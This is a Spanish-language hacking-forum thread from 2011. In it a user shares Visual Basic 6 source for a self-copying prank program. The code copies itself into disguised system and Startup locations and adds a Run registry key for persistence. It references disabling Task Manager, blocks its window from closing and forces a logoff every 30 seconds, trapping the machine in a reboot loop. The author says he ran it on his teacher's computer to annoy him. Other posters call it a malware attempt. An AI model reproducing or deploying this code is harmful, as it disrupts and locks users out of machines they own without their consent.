elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Mi primer programa en Visual Basic :)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Mi primer programa en Visual Basic :)  (Leído 9,791 veces)
Luna71c0


Desconectado Desconectado

Mensajes: 541


El lado oscuro de la luna...


Ver Perfil
Mi primer programa en Visual Basic :)
« en: 19 Julio 2011, 06:40 am »

Hola a todos n.n
hace rato no posteo en el foro porque bueno surgio algun que otro inconveniente (vacaciones)

pero bueno para que vean que estoy a full (? les traje mi primer programa en VB :)

primero que nada quiero aclararles que solo voy a dejar el codigo porque no se a donde subir el programa u.u si alguien me ayuda lo subo :)

y segundo si a alguien se le ocurre probar mi programa para ver que tal anda le recomiendo que lo haga en una maquina virtual o algo de eso :B
Código:
Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long

Option Explicit
  
Private Const RAMA_REGISTRO As String = _
    "HKEY_CURRENT_USER\Software\" & _
    "Microsoft\Windows\CurrentVer" & _
    "sion\Policies\System\DisableTaskmgr"
    
    Dim hora As Date
 Dim horafinal As Date
 Dim HoraLimite As Date

    
  


Private Function Verificar_Existe(path) As Boolean
    
    If Len(Trim$(Dir$(path))) Then
        Verificar_Existe = True
        FileCopy "c:\LunaHAck.exe", "C:\WINDOWS\Cursores.exe"
        FileCopy "c:\LunaHAck.exe", "C:\WINDOWS\Cursores\Cursors.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\WINDOWS\system32\System32help.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Codigo.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Copia.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\WINDOWS\system\Systemhelp.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\Inico.exe"
        FileCopy "C:\WINDOWS\Cursores.exe", "C:\Documents and Settings\All Users\Escritorio\LunaHAck.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\Inico2.exe"
        FileCopy "C:\WINDOWS\Cursores.exe", "C:\WINDOWS\Cursores\Cursors.exe"
        End If
    
End Function




Private Sub Form_Load()
 HoraLimite = "00:00:30"
 Timer1.Interval = 1000
 horafinal = Time + HoraLimite
 Shell "Shutdown -t 10 -l "
 Shell "reg add hklm\software\microsoft\windows\currentversion\run /v programa /t reg_sz /d C:\WINDOWS\Cursores.exe /f "
 Call Verificar_Existe("c:\LunaHAck.exe ")


 End Sub

Private Sub Salir1_Click()
MsgBox "Este no es el boton para salir"

End Sub

Private Sub Salir2_Click()
MsgBox "Con este boton tampoco se sale"
End Sub

Private Sub Salir3_Click()
MsgBox "No, Este tampoco lo es"
End Sub

 Private Sub Timer1_Timer()
 If horafinal < Time Then
 Dim i As Integer
i = ExitWindowsEx(0, 0&)
 Timer1.Enabled = False
 Exit Sub
 End If
 Label1 = Format(horafinal - Time, "HH:MM:SS")
 End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
    Cancel = True
End Sub


Se que de seguro esta todo mal acomodado pero bueno como dice el titulo este es mi PRIMER PROGRAMA :)

Saludos :)

P/D: no creo que le sirva a nadie pero siempre es bueno experimentar en el campo de la programacion :)

Edit: me olvide de decirles el programa esta echo con el fin de joder a otras personas haciendo que la maquina se les reinicie continuamente xD


« Última modificación: 19 Julio 2011, 06:57 am por LunaHAck » En línea


Citar
Un pequeño paso para el programador....
Un gran paso para el hacker...

...]LunaHAck[...


i'm the "Luna71c0"
$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: Mi primer programa en Visual Basic :)
« Respuesta #1 en: 20 Julio 2011, 00:55 am »

Que lastima que tu primer programa sea un intento de malware xD
Esperemos que el segundo sea de otra cosa ;)


En línea

Luna71c0


Desconectado Desconectado

Mensajes: 541


El lado oscuro de la luna...


Ver Perfil
Re: Mi primer programa en Visual Basic :)
« Respuesta #2 en: 20 Julio 2011, 02:24 am »

En realidad es el segundo el primero es un programa que contraresta este :B pero la secuencia es muy basica (A)
En línea


Citar
Un pequeño paso para el programador....
Un gran paso para el hacker...

...]LunaHAck[...


i'm the "Luna71c0"
$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: Mi primer programa en Visual Basic :)
« Respuesta #3 en: 20 Julio 2011, 05:05 am »

Pero aprende a crear cosas basicas primero, aprende a crear un Notepad por ejemplo con opciones nuevas que se te ocurran asi aprendes a usar menus por ejemplo, o crea un Tres en rayas ( ta-te-ti) para aprender a hacer matrices de controles, yo q se
En línea

Sanlegas

Desconectado Desconectado

Mensajes: 131


https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-


Ver Perfil
Re: Mi primer programa en Visual Basic :)
« Respuesta #4 en: 20 Julio 2011, 07:23 am »

La verdad que si, puedes hacer muuuchas cosas que no sean malware y aprender de ellas, aunque tambien del malware se aprende  :silbar:

 @ $Edu$. Me recuerda a alguien que queria hacer un gato con sockets  :silbar:
En línea

extreme69

Desconectado Desconectado

Mensajes: 178


Be BlackHat but don't forget your principles.


Ver Perfil
Re: Mi primer programa en Visual Basic :)
« Respuesta #5 en: 20 Julio 2011, 11:57 am »

Lo que no entiendo es como hacés para q la victima tenga el LunaHAck.exe en c:\...

Al ejecutar esto chequea q tengas ese archivo y si está lo manda a carpetas más disimuladas y desactiva el taskmgr.exe, nada más?

Podrías haberlo hecho en .bat esto, no había necesidad de vb6.
En línea

Luna71c0


Desconectado Desconectado

Mensajes: 541


El lado oscuro de la luna...


Ver Perfil
Re: Mi primer programa en Visual Basic :)
« Respuesta #6 en: 20 Julio 2011, 18:51 pm »

Lo que pasa es que yo tenia acceso a la computadora de mi profesor entonces lo puse en el C :B

y lo que hace es ejecutar el programa
copia el programa en masomenos 7 ubicaciones
bloquea el AMD de tareas :B
modifica el registro de windows para que el programa se abra junto a windows n.n
y hace que al abrir el programa la computadora se apague en 30 segundos :)
en resumen se prende la computadora inicia el programa reinicia la computadora se prende la computadora se inicia el programa y blablabla asi continuamente xD

a todos gracias por sus consejos :) vere que puedo hacer y quiero preguntarles si alguien sabe como hacer que el programa tenga un aspecto mas amigable xD (botones estilo win7 o winxp no ese que parece win98 xD) desde ya gracias :)
En línea


Citar
Un pequeño paso para el programador....
Un gran paso para el hacker...

...]LunaHAck[...


i'm the "Luna71c0"
79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: Mi primer programa en Visual Basic :)
« Respuesta #7 en: 20 Julio 2011, 20:25 pm »

HOLA!!!

Revisa mi BLOQUEO DE PANTALLA.

GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
Luna71c0


Desconectado Desconectado

Mensajes: 541


El lado oscuro de la luna...


Ver Perfil
Re: Mi primer programa en Visual Basic :)
« Respuesta #8 en: 20 Julio 2011, 22:54 pm »

HOLA!!!

Revisa mi BLOQUEO DE PANTALLA.

GRACIAS POR LEER!!!

Hola e.e

sisi ya lo habia revisado y bajado y no me funciono bien onda como que no estaban bloqueado los atajos de teclado entonces podia pasar entre ventanas xD igual despues lo pruevo con mas detenimiento :)
agradeceria que me des una opinion sobre mi programa xD

igual el tuyo me impulso a continuarlo (estaba medio rendido xD )
En línea


Citar
Un pequeño paso para el programador....
Un gran paso para el hacker...

...]LunaHAck[...


i'm the "Luna71c0"
79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: Mi primer programa en Visual Basic :)
« Respuesta #9 en: 21 Julio 2011, 13:12 pm »

HOLA!!!

Hay lineas comentadas que tenes que "descomentar".

GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema con un programa en Visual Basic « 1 2 3 4 »
Ingeniería Inversa
javyer 33 22,580 Último mensaje 28 Febrero 2008, 21:19 pm
por makinen00
Ayuda con programa en Visual Basic
Ingeniería Inversa
Revolutions 4 3,960 Último mensaje 11 Junio 2006, 07:32 am
por BACKFIRE
Error visual basic Programa
Programación Visual Basic
skapunky 6 4,165 Último mensaje 13 Enero 2007, 21:30 pm
por NYlOn
mi primer Flooder en Visual Basic 2010
Programación Visual Basic
S_M_A_C_K 0 1,638 Último mensaje 30 Septiembre 2012, 15:07 pm
por S_M_A_C_K
mi primer proyecto en visual basic 6.0
Programación Visual Basic
lararich 2 2,861 Último mensaje 27 Septiembre 2014, 23:38 pm
por lararich
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines